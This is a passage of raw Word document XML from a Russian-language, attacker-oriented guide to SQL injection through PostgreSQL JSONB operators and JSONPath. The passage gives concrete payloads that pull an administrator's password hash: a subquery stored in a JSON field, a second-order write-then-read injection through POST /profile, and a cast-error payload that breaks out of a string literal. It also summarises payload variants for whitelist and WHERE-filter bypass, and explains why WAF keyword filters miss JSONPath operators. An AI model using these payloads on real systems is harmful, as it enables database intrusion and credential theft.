          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через предыдущий POST-эндпоинт (или просто использует существующего пользователя, у которого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит non-numeric значение).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> атакующий записал:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"role_id": "(SELECT password_hash FROM users WHERE email='admin@co.com')"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Тогда:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT (data-&gt;&gt;'role_id')::int FROM user_profiles WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data-&gt;&gt;'role_id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → text-литерал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"(SELECT password_hash...)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (как строка, не как SQL!). Cast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падает с:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR:  invalid input syntax for type integer: "(SELECT password_hash FROM users WHERE email='admin@co.com')"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Текст leaked в error. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: subquery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не выполнилась</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data-&gt;&gt;'role_id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает literal text без интерпретации. Cast-error содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">строку, которую атакующий записал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не результат выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Реальный leak через cast confusion требует, чтобы subquery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">выполнилась</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> перед попаданием в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Это достижимо через инжекцию в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">другую точку запроса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — например, через jsonb_set с computed value:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload в эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data</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"role_id": "{{ (SELECT password_hash FROM users WHERE email='admin@co.com' LIMIT 1) }}"</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Если приложение наивно сохраняет JSON как есть, дальше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cast при чтении упадёт с leaked в text-сообщении. Здесь требуется second-order injection — атакующий пишет payload через write-канал, leak происходит при read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Более прямой путь — комбинация 3.11.2 + 3.2:</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field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из Payload A):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'::int) || (SELECT cast((SELECT password_hash FROM users LIMIT 1) AS int))::text || ('</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Идея: разорвать литерал, инжектировать cast-error subquery, восстановить квоту. Сложно из-за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> оператора, который принимает text-литерал в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">строго один токен</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Чище комбинировать с 3.2 напрямую, минуя jsonb-канал:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'::int) -- (это уже не jsonb-injection, а классический cast-error)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">То есть 3.11.2 + 3.2 — комбо, где 3.11.2 даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">точку входа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а 3.2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">leak-mechanism</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Что произойдёт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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — utечка любых JSON-полей; обход application-логики «field whitelist».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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JSONPath-tautology через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">like_regex</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обход WHERE-фильтра в jsonb-context.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C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — cast confusion + 3.2 → error-based leak через JSONB-staging.</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на SQL keywords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не покрывает JSONPath operators: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$.path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like_regex</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Они выглядят как валидный JSON-path, не как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`-&gt;&gt;`/`-&gt;`/`#&gt;&gt;`/`#&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это SQL-операторы (записываются прямо в SQL), но имя-литерал внутри payload-текста — не SQL keyword.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 на длину параметра</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обычно отсутствует для JSON-path (legitimate paths могут быть длинными: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data-&gt;&gt;'address.country.code'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JSONPath DSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — мало где в WAF rules, потому что PG 12+ это относительно новая фича.</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`-&gt;`/`-&gt;&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — операторы, добавлены в PG 9.3. Парсер принимает любой text-литерал справа.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JSONPath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SQL/JSON path expressions из SQL:2016. Добавлены в PG 12 (https://www.postgresql.org/docs/12/functions-json.html#FUNCTIONS-SQLJSON-PATH).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JSONPath-grammar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> включает: navigation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.key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filtering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comparisons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&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), arithmetic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boolean logic (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;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regex (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">like_regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), strings (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">starts with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ends with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), type-tests (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">type()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size()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Path parsing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> идёт через отдельный jsonpath-lexer внутри PG core; ошибки парсинга выкидывают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid input syntax for type jsonpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с детальным сообщением (это leak-канал через error).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`-&gt;&gt;`-результат — всегда `text`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — даже если в JSON был </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">number</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Это упрощает атаку (всегда работает text-injection дальше).</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9.3+</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-&gt;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-&gt;&gt;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#&gt;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#&gt;&gt;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12+</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(JSONPath).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SELECT на target table.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JSONB-колонка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или JSON-колонка. JSON отличается — у него нет некоторых операторов; JSONB универсальнее.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data-&gt;&gt;'name' AS name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фиксированный path в SQL-template.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 #&gt;&gt; ARRAY['address', $1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параметризованная нижняя часть path; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">безопасно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если параметр binded.</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data @@ $1::jsonpath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
